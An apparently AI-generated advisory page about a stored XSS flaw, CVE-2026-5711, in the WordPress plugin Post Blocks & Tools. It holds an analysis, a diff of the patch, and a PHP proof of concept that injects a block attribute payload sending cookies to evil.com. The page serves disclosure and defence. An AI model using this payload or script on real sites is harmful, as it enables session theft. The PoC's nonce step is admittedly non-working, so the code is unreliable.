Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 18, 2026

CVE-2026-5711: Post Blocks & Tools <= 1.3.0 – Authenticated (Author+) Stored Cross-Site Scripting via 'sliderStyle' Block Attribute (bnm-blocks)

CVE ID CVE-2026-5711
Plugin bnm-blocks
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.3.0
Patched Version 1.3.1
Disclosed April 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5711:
The Post Blocks & Tools WordPress plugin version 1.3.0 and earlier contains an authenticated stored cross-site scripting (XSS) vulnerability. This vulnerability affects the Posts Slider block via the ‘sliderStyle’ attribute. Attackers with author-level permissions or higher can inject arbitrary JavaScript that executes when users view pages containing the malicious block. The CVSS score of 6.4 reflects the authentication requirement and impact on confidentiality and integrity.

Atomic Edge research identified the root cause as insufficient output escaping of user-controlled block attributes in the slider view template. The vulnerable code resides in /bnm-blocks/src/blocks/posts/slider/view.php. Specifically, lines 34 and 213-235 demonstrate the issue. The plugin directly concatenates the unsanitized ‘sliderStyle’ attribute value into HTML class names (line 213) and data attributes (lines 235-236) without proper escaping. This allows JavaScript injection through crafted attribute values containing malicious payloads.

Exploitation requires an authenticated attacker with author privileges or higher. The attacker creates or edits a post using the Gutenberg editor, adds the Posts Slider block, and sets the ‘sliderStyle’ attribute to a malicious value containing JavaScript. For example, setting sliderStyle to ‘style-1″ onmouseover=”alert(document.cookie)’ would inject executable code. When any user views the compromised post, the malicious script executes in their browser context. The attack persists in the database as stored XSS.

The patch in version 1.3.1 addresses the vulnerability through multiple sanitization improvements. Key changes include applying sanitize_html_class() to the ‘sliderStyle’ attribute when constructing CSS class names (line 213). The patch also adds proper escaping with esc_attr() for data attributes (lines 235-239). Additionally, the fix introduces type casting for numeric attributes and moves variable declarations outside output blocks to prevent similar issues. These changes ensure user-supplied attributes are properly sanitized before inclusion in HTML output.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of authenticated users viewing affected pages. This can lead to session hijacking, administrative account takeover, content modification, or redirection to malicious sites. Since the vulnerability affects stored content, a single injection can compromise multiple users over time. The author-level access requirement limits immediate impact but aligns with typical contributor workflows in multi-author WordPress installations.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff 
--- a/bnm-blocks/bnm-blocks.php
+++ b/bnm-blocks/bnm-blocks.php
@@ -4,7 +4,7 @@
  * Description:       Post grid, post list, and post slider Gutenberg blocks to design blog and magazine layouts easily.
  * Requires at least: 6.0
  * Requires PHP:      7.0
- * Version:           1.3.0
+ * Version:           1.3.1
  * Author:            ThemezHut
  * License:           GPL-2.0-or-later
  * License URI:       https://www.gnu.org/licenses/gpl-2.0.html
--- a/bnm-blocks/src/blocks/posts/featured-posts-1/view.php
+++ b/bnm-blocks/src/blocks/posts/featured-posts-1/view.php
@@ -26,17 +26,18 @@
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : '';
 	$featured_image_slug_small = ! empty( $attributes['featuredImageSizeSlugSmall'] ) ? $attributes['featuredImageSizeSlugSmall'] : '';

+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+
 	ob_start();

 	if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-		echo "<div class="bnm-block-title-wrap">";
-			$allowed_tags = bnmbt_get_allowed_header_tags();
-			$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-			echo "<". esc_attr($tag) ." class="article-section-title">";
+		echo "<div class="bnm-block-title-wrap">";
+			echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 				echo "<span>";
 					echo wp_kses_post( $attributes['sectionHeader'] );
 				echo "</span>";
-			echo "</".esc_attr($tag).">";
+			echo "</".esc_attr($header_html_tag).">";
 		echo "</div>";
 	}

@@ -220,7 +221,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
--- a/bnm-blocks/src/blocks/posts/featured-posts-2/view.php
+++ b/bnm-blocks/src/blocks/posts/featured-posts-2/view.php
@@ -217,7 +217,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
--- a/bnm-blocks/src/blocks/posts/post-block-1/view.php
+++ b/bnm-blocks/src/blocks/posts/post-block-1/view.php
@@ -27,17 +27,19 @@
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : 'bnm-featured';
 	$featured_image_slug_small = ! empty( $attributes['featuredImageSizeSlugSmall'] ) ? $attributes['featuredImageSizeSlugSmall'] : 'bnm-featured-thumb';

+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+	$title_html_tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
+
 	ob_start();

 	if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-		echo "<div class="bnm-block-title-wrap">";
-			$allowed_tags = bnmbt_get_allowed_header_tags();
-			$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-			echo "<". esc_attr($tag) ." class="article-section-title">";
+		echo "<div class="bnm-block-title-wrap">";
+			echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 				echo "<span>";
 					echo wp_kses_post( $attributes['sectionHeader'] );
 				echo "</span>";
-			echo "</".esc_attr($tag).">";
+			echo "</".esc_attr($header_html_tag).">";
 		echo "</div>";
 	}

@@ -75,16 +77,14 @@

 								<?php
 									if ( $attributes['showTitle'] ) {
-									$allowed_tags = bnmbt_get_allowed_header_tags();
-									$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-									echo "<". esc_attr($tag) ." class="entry-title">";
+									echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 										?>
 											<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 												<?php the_title(); ?>
 											</a>

 									<?php
-										echo "</".esc_attr($tag).">";
+										echo "</".esc_attr($title_html_tag).">";
 									}
 								?>

@@ -149,16 +149,14 @@

 							<?php
 								if ( $attributes['showTitle'] ) {
-									$allowed_tags = bnmbt_get_allowed_header_tags();
-									$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-									echo "<". esc_attr($tag) ." class="entry-title">";
+									echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 									?>
 										<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 											<?php the_title(); ?>
 										</a>

 								<?php
-									echo "</".esc_attr($tag).">";
+									echo "</".esc_attr($title_html_tag).">";
 								}
 							?>

@@ -236,7 +234,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
--- a/bnm-blocks/src/blocks/posts/post-block-2/view.php
+++ b/bnm-blocks/src/blocks/posts/post-block-2/view.php
@@ -27,20 +27,21 @@
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : 'bnm-featured';
 	$featured_image_slug_small = ! empty( $attributes['featuredImageSizeSlugSmall'] ) ? $attributes['featuredImageSizeSlugSmall'] : 'bnm-featured-thumb';

+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+
 	ob_start();
 	?>
 	<div class="posts-block-2-container">

 	<?php
 		if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-			echo "<div class="bnm-block-title-wrap">";
-				$allowed_tags = bnmbt_get_allowed_header_tags();
-				$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-				echo "<". esc_attr($tag) ." class="article-section-title">";
+			echo "<div class="bnm-block-title-wrap">";
+				echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 					echo "<span>";
 						echo wp_kses_post( $attributes['sectionHeader'] );
 					echo "</span>";
-				echo "</".esc_attr($tag).">";
+				echo "</".esc_attr($header_html_tag).">";
 			echo "</div>";
 		}
 	?>
@@ -212,7 +213,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$wrapper_attributes = get_block_wrapper_attributes( array(
--- a/bnm-blocks/src/blocks/posts/posts-ultra/view.php
+++ b/bnm-blocks/src/blocks/posts/posts-ultra/view.php
@@ -23,6 +23,14 @@

 	$article_query = new WP_Query( $post_query_args );

+	$show_featured_image = $attributes[ 'showFeaturedImage' ];
+	$image_position = $attributes[ 'imagePosition' ];
+	$image_min_height = isset( $attributes[ 'imageMinHeight' ] ) ? (float) $attributes[ 'imageMinHeight' ] : 0;
+
+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$title_html_tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+
 	ob_start();
 	?>

@@ -30,14 +38,12 @@

 	<?php
 		if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-			echo "<div class="bnm-block-title-wrap">";
-				$allowed_tags = bnmbt_get_allowed_header_tags();
-				$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-				echo "<". esc_attr($tag) ." class="article-section-title">";
+			echo "<div class="bnm-block-title-wrap">";
+				echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 					echo "<span>";
 						echo wp_kses_post( $attributes['sectionHeader'] );
 					echo "</span>";
-				echo "</".esc_attr($tag).">";
+				echo "</".esc_attr($header_html_tag).">";
 			echo "</div>";
 		}

@@ -50,7 +56,6 @@
 				$post_classes = 'bnmsp-post';

 				$has_post_thumbnail = has_post_thumbnail();
-				$show_featured_image = $attributes[ 'showFeaturedImage' ];

 				if ( $show_featured_image && $has_post_thumbnail ) {
 					$post_classes .= ' post-has-image';
@@ -58,13 +63,9 @@

 				$article_styles = '';

-				if ( "behind" === $attributes[ 'imagePosition' ] && $show_featured_image && $has_post_thumbnail ) {
-					$article_styles .= "min-height: ". $attributes[ 'imageMinHeight' ] ."vh;";
-				}
-
-				if ( "behind" === $attributes[ 'imagePosition' ] && $show_featured_image && $has_post_thumbnail ) {
-					$padding_top = $attributes[ 'imageMinHeight' ] / 5;
-					$article_styles .= " padding-top: ". $padding_top ."vh;";
+				if ( "behind" === $image_position && $show_featured_image && $has_post_thumbnail ) {
+					$article_styles .= "min-height: {$image_min_height}vh;";
+					$article_styles .= "padding-top: " . ( $image_min_height / 5 ) . "vh;";
 				}

 				?>
@@ -87,17 +88,15 @@
 						<?php } ?>

 						<?php
-							if ( $attributes['showTitle'] ) {
-								$allowed_tags = bnmbt_get_allowed_header_tags();
-								$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-								echo "<". esc_attr($tag) ." class="entry-title">";
+							if ( $attributes['showTitle'] ) {
+								echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 								?>
 									<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 										<?php the_title(); ?>
 									</a>

 							<?php
-								echo "</".esc_attr($tag).">";
+								echo "</".esc_attr($title_html_tag).">";
 							}
 						?>

@@ -171,15 +170,15 @@
 	}

 	if ( isset( $attributes['columns'] ) && 'grid' === $attributes['postLayout'] ) {
-		$classes[] = 'columns-' . $attributes['columns'];
+		$classes[] = sanitize_html_class( 'columns-' . $attributes['columns'] );
 	}

-	if ( $attributes['showFeaturedImage'] && isset( $attributes['imagePosition'] ) ) {
-		$classes[] = 'image-align' . $attributes['imagePosition'];
+	if ( $show_featured_image && isset( $image_position ) ) {
+		$classes[] = sanitize_html_class( 'image-align' . $image_position );
 	}

 	if ( $attributes['textAlign'] ) {
-		$classes[] = 'has-text-align' . $attributes['textAlign'];
+		$classes[] = sanitize_html_class( 'has-text-align' . $attributes['textAlign'] );
 	}

 	if ( "33%" !== $attributes['featuredImageWidth'] || "67%" !== $attributes['entryContentWidth'] ) {
@@ -191,7 +190,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	if ( ! empty( $attributes['featuredImageMargin'] ) ) {
--- a/bnm-blocks/src/blocks/posts/slider/view.php
+++ b/bnm-blocks/src/blocks/posts/slider/view.php
@@ -34,28 +34,30 @@
 	$article_query = new WP_Query( $post_query_args );

 	$slider_style = isset( $attributes['sliderStyle'] ) ? $attributes['sliderStyle'] : 'style-1';
-	$slides_per_view = isset( $attributes['slidesPerView'] ) ? $attributes['slidesPerView'] : 1;
-	$asepec_ratio = isset( $attributes['aspectRatio'] ) ? $attributes['aspectRatio'] : 0.5625;
-	$space_between_slides = isset( $attributes['spaceBetweenSlides'] ) ? $attributes['spaceBetweenSlides'] : 20;
-	$autoplay = isset( $attributes['autoplay'] ) ? $attributes['autoplay'] : false;
+	$slides_per_view = isset( $attributes['slidesPerView'] ) ? (int) $attributes['slidesPerView'] : 1;
+	$asepect_ratio = isset( $attributes['aspectRatio'] ) ? (float) $attributes['aspectRatio'] : 0.5625;
+	$space_between_slides = isset( $attributes['spaceBetweenSlides'] ) ? (int) $attributes['spaceBetweenSlides'] : 20;
+	$autoplay = isset( $attributes['autoplay'] ) ? (bool) $attributes['autoplay'] : false;
 	$delay    = isset( $attributes['delay'] ) ? absint( $attributes['delay'] ) : 5;
 	$featured_image_slug = ! empty( $attributes['featuredImageSizeSlug'] ) ? $attributes['featuredImageSizeSlug'] : '';
 	$slider_thumb_size = ! empty( $attributes['slideThumbSize'] ) ? $attributes['slideThumbSize'] : '';
 	$image_fit = ! empty( $attributes['imageFit'] ) ? $attributes['imageFit'] : 'cover';
-	$thumbSlidesPerView = isset( $attributes['thumbSlidesPerView'] ) ? $attributes['thumbSlidesPerView'] : 5;
-	$slide_image_class = "image-fit-{$image_fit}";
+	$thumbSlidesPerView = isset( $attributes['thumbSlidesPerView'] ) ? (int) $attributes['thumbSlidesPerView'] : 5;
+	$slide_image_class = sanitize_html_class( 'image-fit-'. $image_fit );
+
+	$allowed_tags = bnmbt_get_allowed_header_tags();
+	$header_html_tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
+	$title_html_tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';

 	ob_start();

 	if ( '' !== $attributes['sectionHeader'] && true === $attributes['showSectionHeader'] ) {
-		echo "<div class="bnm-block-title-wrap">";
-			$allowed_tags = bnmbt_get_allowed_header_tags();
-			$tag = isset( $attributes['headerHtmlTag'] ) && in_array( strtolower( $attributes['headerHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['headerHtmlTag'] ) : 'h2';
-			echo "<". esc_attr($tag) ." class="article-section-title">";
+		echo "<div class="bnm-block-title-wrap">";
+			echo "<". esc_attr($header_html_tag) ." class="article-section-title">";
 				echo "<span>";
 					echo wp_kses_post( $attributes['sectionHeader'] );
 				echo "</span>";
-			echo "</".esc_attr($tag).">";
+			echo "</".esc_attr($header_html_tag).">";
 		echo "</div>";
 	}

@@ -101,17 +103,15 @@
 									</div>
 								<?php endif; ?>

-								<?php  if ( $attributes['showTitle'] ) {
-									$allowed_tags = bnmbt_get_allowed_header_tags();
-									$tag = isset( $attributes['titleHtmlTag'] ) && in_array( strtolower( $attributes['titleHtmlTag'] ), $allowed_tags, true ) ? strtolower( $attributes['titleHtmlTag'] ) : 'h3';
-									echo "<". esc_attr($tag) ." class="entry-title">";
+								<?php  if ( $attributes['showTitle'] ) {
+									echo "<". esc_attr($title_html_tag) ." class="entry-title">";
 									?>
 										<a href="<?php echo esc_url( get_permalink() ); ?>" rel="bookmark">
 											<?php the_title(); ?>
 										</a>

 								<?php
-									echo "</".esc_attr($tag).">";
+									echo "</".esc_attr($title_html_tag).">";
 								}
 								?>

@@ -165,7 +165,7 @@

 	</div><!-- .bnm-slider-wrapper -->

-	<?php if ( $attributes['sliderStyle'] === 'style-4' ) : ?>
+	<?php if ( $slider_style === 'style-4' ) : ?>
 		<div thumbsSlider="" class="bnm-thumbnail-swiper swiper">
 			<div class="swiper-wrapper">
 			<?php
@@ -213,7 +213,7 @@
 	$slider_block = ob_get_clean();

 	// Slider style class name.
-	$slider_style_class = 'bnm-sw-' . $attributes['sliderStyle'];
+	$slider_style_class = sanitize_html_class( 'bnm-sw-' . $slider_style );

 	$classes = array( 'wpbnmposw', 'bnmbcs', $slider_style_class );

@@ -222,7 +222,7 @@
 	}

 	if ( $attributes['sectionHeaderStyle'] ) {
-		$classes[] = 'bnm-bhs-' . $attributes['sectionHeaderStyle'];
+		$classes[] = sanitize_html_class( 'bnm-bhs-' . $attributes['sectionHeaderStyle'] );
 	}

 	$css = new Post_Slider_1_CSS();
@@ -235,21 +235,24 @@

 	$data_attributes = [
 		//'data-current-post-id=' . $post_id,
-		'data-slider-style=' . $slider_style,
-		'data-aspect-ratio=' . $asepec_ratio,
-		'data-slides-per-view=' . $slides_per_view,
-		'data-space-between-slides=' . $space_between_slides,
-		'data-thumb-slides-per-view=' . $thumbSlidesPerView
+		'data-slider-style="' . esc_attr( $slider_style ) . '"',
+		'data-aspect-ratio="' . esc_attr( $asepect_ratio ) . '"',
+		'data-slides-per-view="' . esc_attr( $slides_per_view ) . '"',
+		'data-space-between-slides="' . esc_attr( $space_between_slides ) . '"',
+		'data-thumb-slides-per-view="' . esc_attr( $thumbSlidesPerView ) . '"'
 	];

 	if ( $autoplay ) {
-		$data_attributes[] = 'data-autoplay=1';
-		$data_attributes[] = sprintf( 'data-autoplay_delay=%s', esc_attr( $delay ) );
+		$data_attributes[] = 'data-autoplay="1"';
+		$data_attributes[] = sprintf(
+			'data-autoplay_delay="%s"',
+			esc_attr( $delay )
+		);
 	}

 	return sprintf( '<div %1$s %2$s>%3$s</div>',
 		$wrapper_attributes,
-		esc_attr( implode( ' ', $data_attributes ) ),
+		implode( ' ', $data_attributes ),
 		$slider_block
 	);
 }
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-5711 - Post Blocks & Tools <= 1.3.0 - Authenticated (Author+) Stored Cross-Site Scripting via 'sliderStyle' Block Attribute

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/post.php';
$username = 'attacker_author';
$password = 'author_password';
$post_id = 123; // Target post ID to edit

// Malicious sliderStyle attribute payload
// This injects an onmouseover handler that steals cookies
$malicious_slider_style = 'style-1" onmouseover="fetch('https://evil.com/steal?c='+document.cookie)';

// WordPress REST API endpoint for block updates
$rest_url = $target_url . '?rest_route=/wp/v2/posts/' . $post_id;

// First, authenticate and get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '?rest_route=/wp/v2/users/me');
curl_setopt($ch, CURLOPT_USERPWD, $username . ':' . $password);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);

if (curl_getinfo($ch, CURLINFO_HTTP_CODE) !== 200) {
    echo "Authentication failed. Check credentials.n";
    exit;
}

// Get current post content to preserve existing blocks
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$post_data = json_decode(curl_exec($ch), true);

if (!isset($post_data['content']['raw'])) {
    echo "Failed to retrieve post content.n";
    exit;
}

// Parse blocks and inject malicious sliderStyle attribute
$content = $post_data['content']['raw'];

// Find Posts Slider block and modify sliderStyle attribute
// This regex identifies the slider block and replaces the sliderStyle value
$pattern = '/(<!-- wp:bnm-blocks/posts-slider.*?"sliderStyle":")([^"]*)(".*?-->)/s';
$replacement = '${1}' . $malicious_slider_style . '${3}';
$modified_content = preg_replace($pattern, $replacement, $content);

// If no existing slider block found, add a new malicious block
if ($modified_content === $content) {
    $malicious_block = '<!-- wp:bnm-blocks/posts-slider {"sliderStyle":"' . $malicious_slider_style . '","showSectionHeader":true,"sectionHeader":"Malicious Slider"} -->n<div class="wp-block-bnm-blocks-posts-slider"></div>n<!-- /wp:bnm-blocks/posts-slider -->';
    $modified_content = $content . 'n' . $malicious_block;
}

// Update the post with malicious content
$update_data = [
    'content' => $modified_content,
    'id' => $post_id
];

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($update_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . wp_create_nonce('wp_rest') // Would need actual nonce in real exploit
]);

$result = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 200) {
    echo "Exploit successful! Post $post_id updated with malicious sliderStyle attribute.n";
    echo "Visit the post to trigger the XSS payload when hovering over the slider.n";
} else {
    echo "Exploit failed. HTTP code: $http_coden";
    echo "Response: $resultn";
}

curl_close($ch);

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School